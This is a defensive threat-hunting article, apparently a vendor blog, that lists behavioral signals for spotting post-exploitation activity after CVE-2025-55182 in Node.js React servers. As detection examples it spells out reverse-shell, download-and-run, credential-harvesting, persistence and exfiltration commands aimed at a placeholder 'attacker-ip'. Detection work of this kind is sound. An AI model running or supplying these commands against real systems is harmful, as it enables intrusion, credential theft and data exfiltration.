Hunt Mode with Nebulock‍

This series breaks down modern threats by focusing on the one thing attackers cannot hide: behavior. It focuses on the actions, decisions, and required steps that give away real threats. No signatures or hash hunts, just the behaviors that stay the same even when tooling changes. Hunt Mode offers guidance on how you baseline, hunt, and validate activity in your environment. To hunt these behaviors, you need basic visibility into Node.js process activity, parent-child relationships, and command-line execution. EDR process logs, web application logs, and standard system telemetry are enough to operationalize every behavior in this breakdown.

Hunt Mode: CVE-2025-55182

CVE-2025-55182 represents where web application attacks are going. It is pre-authentication, requires no user interaction, and achieves remote code execution through unsafe deserialization. That means traditional web application firewalls and signature-based detection will not take you very far.

To catch it, you must hunt the behaviors it relies on.

Below is a tactic-by-tactic breakdown of the specific behaviors that matter based on a real threat hunt.

Initial Access: When Exploitation Happens Before You Can See It

CVE-2025-55182 exploitation happens at the HTTP layer through malicious POST requests to React Server Function endpoints. Without web application logs, this stage is invisible.

The malicious activity is visible immediately after exploitation.

In successful attacks, the malicious request is followed within seconds by unexpected process activity from the Node.js runtime.

What to Observe

• Timing correlation between inbound HTTP requests and process creation
  An HTTP POST to a server function endpoint followed almost immediately by Node.js spawning a child process is a strong exploitation signal.
• Node.js processes that suddenly begin spawning child processes
  Production web servers should have stable, long-running node processes. New child process activity is suspicious.
• Unexpected process parents for Node.js
  Legitimate: systemd, pm2, docker-containerd-shim
  Suspicious: bash, sh, curl (indicates post-exploitation command execution)‍
• Package manager activity on production servers
  npm install on production servers outside deployment windows is unusual.

Behavior Signal
You cannot see the HTTP exploitation without web logs, but you can see what happens immediately after. Stable web servers do not suddenly start spawning shells.

Execution: Web Applications Breaking Their Own Rules

After exploitation, attackers need interactive command execution. That means Node.js spawning shells.

What to Observe

• Node.js spawning bash or sh with interactive flags
  node → bash -i or node → sh -iWeb applications have no legitimate reason to spawn interactive shells.
• Reverse shell patterns in command lines
  
  • /dev/tcp/ file descriptor redirections
  • nc -e or ncat -e patterns
  • exec 5<> file descriptor manipulation
• Shell execution with network redirection syntax
  bash -c "exec 5<>/dev/tcp/attacker-ip/port"

Behavior Signal
Production web applications spawn child processes for specific tasks (git, docker, kubectl). They do not usually spawn interactive shells or establish reverse connections.

Credential Access: When Web Apps Start Reading Secrets Manually

After gaining code execution, attackers enumerate credentials. On web servers, this means accessing files that should only be read programmatically.

What to Observe

• Node.js spawning cat or grep targeting credential files
  Examples:
  
  • node → cat .env
  • node → grep AWS ~/.aws/credentials
  • node → find ~ -name "id_rsa"
• printenv or env commands from web context
  Development IDEs spawn printenv legitimately, but rapid sequences or unusual timing indicates harvesting.
• Sequential credential file access
  Accessing .env → .aws/credentials → .ssh/id_rsa within minutes signals automated enumeration.

Behavior Signal
Applications read .env files programmatically at startup through libraries like dotenv. They do not spawn cat or grep to read secrets at runtime. That is attacker behavior.

Discovery: Reconnaissance Commands Web Servers Should Not Run

Attackers orient themselves by running system enumeration commands. Web applications do not need to know who they are.

What to Observe

• Node.js spawning reconnaissance commands
  
  • whoami (web apps already know their user context)
  • id (no need to check permissions at runtime)
  • hostname (configuration is static)
  • uname -a (OS fingerprinting)
• Rapid-fire command sequences
  whoami; id; hostname; uname -a within seconds indicates manual enumeration, not automated tooling.
• Network discovery from web context
  
  • netstat -an or ss -tulpn (port scanning)
  • ifconfig or ip addr (network mapping)
  • ps aux (process enumeration)

Behavior Signal
Monitoring tools spawn ps and uname periodically. Attackers spawn multiple discovery commands in rapid succession. The difference is in the timing and diversity of commands.

Persistence: Web Apps Modifying System Startup Mechanisms

To maintain access, attackers establish persistence. Web applications should never touch system-level persistence mechanisms. While persistence techniques vary by operating system, the behavior is the same: a web process reaching outside its runtime to survive restarts.

What to Observe

• Node.js modifying cron jobs (Linux)
  
  • node → crontab -e
  • echo "* * * * * /bin/bash..." >> /var/spool/cron/crontabs/
• systemd service modification (Linux)
  
  • systemctl daemon-reload from node context
  • systemctl enable malicious.service
  • Writing to /etc/systemd/system/
• SSH key injection (Linux)
  
  • echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
  • Any authorized_keys modification from web processes
• macOS Launch Agents/Daemons modification (macOS)
  
  • launchctl load with new plists
  • Writing to ~/Library/LaunchAgents/ from node

Behavior Signal
Web applications are already persistent. Process managers like systemd, pm2, or container runtimes handle restarts. Any attempt by a web process to create its own persistence, regardless of operating system, indicates post-exploitation activity.

Command & Control: Network Tools Appearing in the Wrong Context

Attackers use curl, wget, and nc to communicate with command and control infrastructure or download additional payloads.

What to Observe

• Node.js spawning network tools with malicious patterns
  
  • curl http://attacker-ip/payload.sh | bash
  • wget -O /tmp/exploit.sh http://attacker-ip/
  • nc attacker-ip 4444 -e /bin/bash
• Staging downloads to temporary directories
  /tmp/, /var/tmp/, /dev/shm/ are common staging locations
• curl or wget to non-standard destinations
  Not: npmjs.org, github.com, internal APIs
  Yes: Unknown external IPs, suspicious domains

Behavior Signal
Node.js applications make HTTP requests through libraries (axios, node-fetch), not by spawning curl. Command-line network tools from web processes indicate attacker activity, not application logic.

Lateral Movement: When Web Servers Start Moving Sideways

With initial access, attackers pivot to other systems.

What to Observe

• SSH spawned by Node.js to internal hosts
  node → ssh user@internal-ip
  Web applications do not SSH to other systems.
• scp or rsync from web context
  node → scp /tmp/data.tar.gz user@target-host:/tmp/
  File transfers to other hosts indicate lateral movement.
• Port scanning from web servers
  
  • nmap spawned by node
  • nc used for port checking

Behavior Signal
Web servers accept connections. They do not initiate SSH sessions or file transfers to other systems. Container orchestration (kubectl exec, docker cp) is legitimate. SSH from node is not.

Exfiltration: Data Leaving Through Obvious Channels

Attackers compress and exfiltrate stolen data through standard network utilities.

What to Observe

• Data staging followed by network transmission
  Sequence: tar -czf /tmp/secrets.tar.gz ~/.aws/ → curl -X POST -d @/tmp/secrets.tar.gz http://attacker-ip/
• Base64 encoding before network transmission
  base64 credentials.txt | curl -X POST --data-binary @- http://attacker-ip/
• Rapid file access → compression → network transmission patterns
  All within minutes on the same host indicates automated exfiltration.

Behavior Signal
You can detect exfiltration by watching the sequence, not just the network call. Legitimate backups follow different timing patterns and use different parent processes.

Behavioral Hunts Catch What Exploits Can't Hide

CVE-2025-55182 is built to exploit a deserialization vulnerability, but post-exploitation it still has to:

• execute shells
• access credentials
• establish persistence
• enumerate systems
• communicate with C2
• move laterally
• exfiltrate data

Each stage leaves a behavioral fingerprint. If you hunt the behavior instead of the exploit, you detect the compromise and not just the vulnerability.

Happy hunting!